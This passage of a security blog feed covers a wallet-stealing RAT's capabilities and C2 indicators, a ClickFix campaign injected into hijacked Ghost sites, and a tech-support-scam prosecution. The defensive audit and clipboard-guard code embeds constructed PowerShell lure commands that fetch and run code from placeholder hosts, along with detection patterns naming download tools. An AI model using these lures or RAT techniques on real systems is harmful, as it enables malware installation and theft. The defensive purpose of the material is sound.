- Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
- Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and Chromodo
- Exfiltrate Telegram, Discord, and Lightcord data
- Record and modify clipboard data
- List folders, files and exfiltrate content from files with specific extensions
- Capture screenshots using different methods
- Execute additional payloads
- Launch or terminate arbitrary processes
- Execute commands with PowerShell
- Establish SOCKS5 proxy tunnels over WebSocket
One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult.
To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket.
[Image: The injected HTML page inside the Edge browser]
The RAT uses the following endpoints for C2 communication, which can vary between samples:
- /health: checks the “ok” response from the C2
- /token: receive config parameters, task delivery, results, and exfiltrated data
- /vnc/agent/: WebSocket path used for VNC communication
The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data:
{
  "buildId": "cd361ef3159f5ce9",
  "buildNote": "BWR",
  "buildType": "msi-v2",
  "proxyUrls": ["{C2}"],
  "userId": "…",
  "accessTokenHash": "…",
  "iat": 1779372546,
  "exp": 2094948546
}
We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication.
[Image: The “light” version of the RAT]
Acknowledgements
- DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis
- Smokest: https://x.com/vxunderground/status/2013006601133687004
URLs
- https[:]//github.com/claude-free-plugin/
- https[:]//github.com/ai-gen-profi
- https[:]//github.com/wharfdemolisherpit
- https[:]//sourceforge.net/projects/gearup/
- https[:]//sourceforge.net/projects/bluewaveremover/
Domains
- claudescript[.]top: distribution website
- ms-telemetry-gateway-us[.]com: C2
- dakatawebstick[.]com: C2
- ashpaltlonpro[.]com: C2
- cf-proxy[.]cloud-analytics-services[.]workers.dev: C2
- agilemast3r[.]duckdns[.]org: C2
- geralnewlong[.]com: C2
- hngfbgfbfb[.]cyou: C2
- logicalnewrestore[.]com: C2
IPs
- 23[.]227[.]196[.]107: C2
- 45[.]137[.]99[.]121: C2
- 31[.]57[.]129[.]23: C2
- 66[.]78[.]40[.]107: C2
- 193[.]233[.]198[.]132: C2
700+ education and tech websites hijacked in huge ClickFix malware campaign
Attackers are abusing a critical Ghost Content Management System (CMS) vulnerability to hijack more than 700 legitimate websites and inject a fake Cloudflare verification step that tricks visitors into running a Windows command that installs malware.
These social engineering campaigns—where website visitors are tricked into running malicious commands on their systems—are commonly known as “ClickFix” attacks. In this case, cybercriminals turned websites belonging to trusted organizations, including universities and tech companies, into delivery platforms for the malware campaign.
More than 700 Ghost‑powered websites were compromised through a known SQL injection vulnerability tracked as CVE‑2026‑26980. The attackers used this bug to steal administrative API keys and silently inject malicious JavaScript into posts and pages across affected sites.
Researchers found that the injected script loads a second‑stage ClickFix flow, presenting visitors with a fake Cloudflare or CAPTCHA verification dialog.
[Image: Example of fake Cloudflare verification]
Instead of a normal checkbox, the page instructs users to paste a command into the Windows Run dialog or PowerShell, effectively tricking them into installing malware on their own systems.
Details for website managers
At the heart of this campaign is a critical SQL injection bug in Ghost’s Content API. The researchers noted:
“Without any authentication, an attacker can directly read the database contents through this vulnerability, including the Admin API Key used to call the Ghost Admin API.”
The vulnerability affects Ghost versions 3.24.0 through 6.19.0 and can be exploited without logging in.
A patched version is now available and should be installed as soon as possible, and not only because of the ClickFix campaign: once attackers hold an Admin API key, they can edit, delete, or create posts, inject scripts, hijack themes, and tamper with user‑facing content in other ways. Because the bug exposed the key itself, patching alone does not lock a thief out; regenerate the Admin API keys of every integration on an affected site as well, and review recent post edits for content you did not publish.
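Reviewing a site’s posts for injected script is the part a Ghost administrator can automate. The following is an added example written for this article, not Malwarebytes’ or Ghost’s tooling: audit_post_html() flags script tags that load from hosts outside an allowlist and inline scripts that carry ClickFix‑style payloads (clipboard writes, Windows Run instructions, PowerShell), and fetch_posts() shows how to pull rendered post HTML from a site’s own Content API. The two posts are constructed; the loader domain and allowlist entry in them are placeholders, not indicators from this article.

```python
"""Audit Ghost posts for injected scripts. Added example; the posts below are
constructed and ALLOWED_SCRIPT_HOSTS is an assumption to tune per site."""
import json
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Script hosts your theme legitimately embeds; anything else is reported.
ALLOWED_SCRIPT_HOSTS = {"cdn.jsdelivr.net"}  # ASSUMPTION: replace with your own

# Strings that have no business inside a blog post's inline script.
SUSPICIOUS_TOKENS = ("navigator.clipboard", "writetext", "execcommand", "powershell",
                     "mshta", "verify you are human", "cloudflare", "win+r")


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from post HTML."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_post_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Findings for one post's rendered HTML; an empty list means nothing odd."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urllib.parse.urlsplit(src).hostname or "(relative)"
        if host not in allowed_hosts:
            findings.append(f"external script from unlisted host: {src}")
    for code in p.inline:
        low = code.lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t in low]
        if hits:
            findings.append("inline script contains " + ", ".join(hits))
    return findings


def audit_posts(posts):
    """Map post id -> findings for every post that has any."""
    out = {}
    for post in posts:
        findings = audit_post_html(post["html"])
        if findings:
            out[post["id"]] = findings
    return out


def fetch_posts(site, content_api_key, limit=100):
    """Pull rendered post HTML from a Ghost site's Content API (network call)."""
    q = urllib.parse.urlencode({"key": content_api_key, "formats": "html", "limit": limit})
    with urllib.request.urlopen(f"{site}/ghost/api/content/posts/?{q}") as resp:
        return json.load(resp)["posts"]


# Constructed posts: one clean, one carrying an injected ClickFix lure.
CLEAN_POST = ('<p>Term dates for autumn</p>'
              '<script src="https://cdn.jsdelivr.net/npm/prism/prism.min.js"></script>')
INJECTED_POST = ('<p>Term dates for autumn</p>'
                 '<script src="https://static.example-loader.invalid/cf.js"></script>'
                 '<script>document.querySelector("#cf-verify").onclick=()=>{'
                 'navigator.clipboard.writeText("powershell -w hidden -c iwr http://lure.invalid/a");'
                 'alert("Press Win+R, paste, and hit Enter to verify you are human")}</script>')


if __name__ == "__main__":
    print(audit_posts([{"id": "1", "html": CLEAN_POST}, {"id": "2", "html": INJECTED_POST}]))
```

Run it against every post, not just recent ones: the injected script was added through the Admin API, so the post’s visible publish date tells you nothing about when it was modified.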
How to stay safe
This campaign is likely to be particularly effective because the instructions are framed as harmless technical steps such as “verify you’re human,” “fix your connection,” or “continue to the site.” Worse still, the content appears on websites users already trust.
With ClickFix running rampant—and it doesn’t look like it’s going away anytime soon—it’s important to be aware, careful, and protected.
- Slow down. Don’t follow instructions on a webpage without thinking them through, especially if the page asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass critical thinking, and many ClickFix pages use countdowns, fake user counters, or other pressure tactics to make you act quickly.
- Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.
- Be cautious when copy-pasting commands. Attackers often disguise malicious payloads inside clipboard text. Typing commands manually instead of copy-pasting them can reduce the risk of unknowingly running hidden malicious payloads.
- Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
- Stay informed about evolving attack techniques. Cybercriminals constantly adapt their methods, and awareness remains one of your best defenses, so keep reading our blog!
Pro tip: Did you know the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?
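The mechanism the fake verification page relies on, and the clipboard warning the tip above describes, both come down to a page writing a command into the clipboard. The following is an added example (not the Browser Guard extension’s code, nor the campaign’s script): a guard that wraps the two browser APIs such a page uses, `navigator.clipboard.writeText()` and `document.execCommand('copy')`, scores the text being copied for command-like content, and can block the write. The indicator patterns, the scoring threshold, the fake window object and the sample lure text are all assumptions made for the example; the lure is constructed to resemble the pattern the article describes, not copied from it.

```javascript
// Added example (not code from the article, Browser Guard, or the campaign):
// a clipboard guard for ClickFix-style lures. Runs stand-alone in Node with a
// fake window object; in a browser, pass the real window.
'use strict';

// Assumed indicators of "this is a command, not prose". Tune for your estate.
const COMMAND_INDICATORS = [
  /\bpowershell(\.exe)?\b/i,
  /\bpwsh\b/i,
  /\bmshta(\.exe)?\b/i,
  /\bcmd(\.exe)?\s*\/[ck]\b/i,
  /\b(iex|invoke-expression)\b/i,
  /\b(iwr|invoke-webrequest|curl|wget|certutil)\b/i,
  /-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}/i,
  /\bexecutionpolicy\s+bypass\b/i,
  /(^|\s)-w(indowstyle)?\s+h(idden)?\b/i,
];

// Many lures pad the command with a long run of spaces and a comment so the
// Run dialog's narrow box shows only the harmless tail ("I am not a robot").
const TRAILING_COMMENT = /\s{10,}(#|::|rem\s).*$/i;

function classifyClipboardText(text) {
  const hits = COMMAND_INDICATORS.filter((re) => re.test(text)).map((re) => re.source);
  const padded = TRAILING_COMMENT.test(text);
  const urlCount = (text.match(/https?:\/\/[^\s'"]+/gi) || []).length;
  const score = hits.length + (padded ? 2 : 0) + (urlCount > 0 ? 1 : 0);
  return { suspicious: score >= 2, score, hits, padded, urlCount };
}

// Wrap the clipboard entry points on a window-like object. Every write is
// recorded; suspicious ones call onAlert and, with block=true, are refused.
function installClipboardGuard(win, onAlert, { block = false } = {}) {
  const events = [];
  const report = (source, text) => {
    const verdict = classifyClipboardText(text);
    const event = { source, text, ...verdict };
    events.push(event);
    if (verdict.suspicious) onAlert(event);
    return verdict.suspicious;
  };

  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === 'function') {
    const original = clip.writeText.bind(clip);
    clip.writeText = (text) => {
      if (report('navigator.clipboard.writeText', String(text)) && block) {
        return Promise.reject(new Error('clipboard write blocked by guard'));
      }
      return original(text);
    };
  }

  const doc = win.document;
  if (doc && typeof doc.execCommand === 'function') {
    const original = doc.execCommand.bind(doc);
    doc.execCommand = (cmd, ...rest) => {
      if (String(cmd).toLowerCase() === 'copy') {
        const selected = doc.getSelection ? String(doc.getSelection()) : '';
        if (report('document.execCommand("copy")', selected) && block) return false;
      }
      return original(cmd, ...rest);
    };
  }
  return events;
}

// Constructed sample inputs (not taken from the campaign).
const SAMPLE_LURE =
  'powershell -w h -c "iwr http://example.invalid/x | iex"' +
  ' '.repeat(40) + '# I am not a robot - Verification ID: 8412';
const SAMPLE_BENIGN = 'Thanks for reading! Share this post with a friend.';

// Stand-alone run: one command-like payload, one harmless string.
console.log(classifyClipboardText(SAMPLE_LURE));
console.log(classifyClipboardText(SAMPLE_BENIGN));
```

Two caveats a practitioner should carry over. First, a page can also populate the clipboard from a `copy` event handler via `event.clipboardData.setData()`, so a real guard listens for that event as well as wrapping the two functions above. Second, a page-level script can be undone by the page itself; the reason the extension form of this check works is that it runs in a context the page cannot reach.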
Scammers pretending to be Microsoft had help from US executives
A pop-up appears on your computer, warning of a virus. You call the “Microsoft technician” in the pop-up message, and they explain that they need remote access to fix it. Most of us know this script by now. It’s a scam, operated by people intent on siphoning money from your account.
A court case last week gave us more insight into how these operations work. Two former executives of call tracking and analytics company C.A. Cloud Attribution Ltd pleaded guilty to selling phone numbers and call infrastructure to tech support scammers. Prosecutors say they even coached their illegitimate customers on how to avoid getting caught.
Adam Young, former CEO, and Harrison Gevirtz, former CSO, ran the company between early 2017 and April 2022. According to the Department of Justice (DOJ), they sold telephone numbers, call recordings, and call-forwarding services to companies in India they knew were running tech support fraud operations. The two are US residents, but C.A. Cloud Attribution was registered in Cyprus.
The scams themselves followed a familiar pattern, using fake pop-ups warning of imaginary infections. Victims were persuaded to call the numbers, where agents impersonated Microsoft and Apple and charged hundreds of dollars for fictitious technical work. In some cases, scam agents would gain access to victims’ systems and obtain personal financial information through remote access.
Willing participants
The two executives didn’t just look the other way. Prosecutors say they advised their fraud clients to rotate through large pools of numbers so complaints wouldn’t get any single account terminated. They also told their own sales staff to pursue businesses they already knew were fraudulent. On occasion, they brokered introductions so fraudsters could buy and sell calls between each other.
To cap it all, the pair also ran a call center of their own in Tunisia from 2016 to April 2022, where some staff allegedly carried out fake tech support scams themselves.
According to FBI Boston Special Agent in Charge Ted E. Docks:
“What the CEO and CSO of this well-known call tracking and analytics company did was downright despicable. By their own admission, they willfully profited from telemarketing and tech support scammers, here and abroad, who preyed on the elderly, exploited the vulnerable, and drained victims of their life savings and peace of mind.”
Young and Gevirtz pleaded guilty to misprision of a felony (concealing knowledge of a crime), which carries a maximum sentence of three years in federal prison and a $250,000 fine. It’s notable that the Feds didn’t get them on wire fraud conspiracy, which carries up to 20 years in the slammer.
C.A. Cloud Attribution isn’t the first infrastructure provider to get caught helping tech support scammers. In 2023, the Federal Trade Commission (FTC) went after payment processor Nexway, alleging the company had been “strongly dependent” on its “premium tech support” clients that accounted for roughly a quarter of its revenue. Visa had already placed Nexway into its Chargeback Monitoring Program in December 2017, but the fraud continued anyway. The FTC originally sought a $49.5 million penalty, later reduced to $650,000.
The next call from “Microsoft”
The pattern is consistent. The scam itself might be loud, with pop-up sirens and fake blue-screen warnings, but the supply chain underneath it often looks dull and corporate. According to court documents, Young and Gevirtz deliberately stopped their details appearing on pop-up tech support alerts so that C.A. Cloud Attribution could keep a low profile.
If a well-known call tracking and analytics company can spend years knowingly routing calls into scam operations and face a maximum sentence of three years, it raises uncomfortable questions about deterrence for the next vendor tempted to look the other way.
Sentencing for both men is scheduled for June 16, 2026.
A week in security (May 18 – May 24)
Last week on Malwarebytes Labs:
- Update Chrome now: Critical bugs could let attackers run code
- Microsoft Defender vulnerabilities are being exploited in the wild
- TikTok, YouTube, and Roblox face scrutiny, but age gates won’t fix child safety
- Catch spyware in the act with Windows Webcam Monitoring
- Researchers left AI agents alone in a virtual town and watched it all unravel
- Fake malware-signing service Fox Tempest dismantled by Microsoft
- Firefox 151 packs big privacy upgrades into a small update
- Biometrics, diagnoses, and bank details exposed in major healthcare breach
- Facebook scam promises cheap Aldi meat boxes, steals payment info instead
- YouTube wants your face to fight deepfakes
- Microsoft is changing Edge’s plaintext password behavior
- AI is distorting the Holocaust (Lock and Code S07E10)
Stay safe!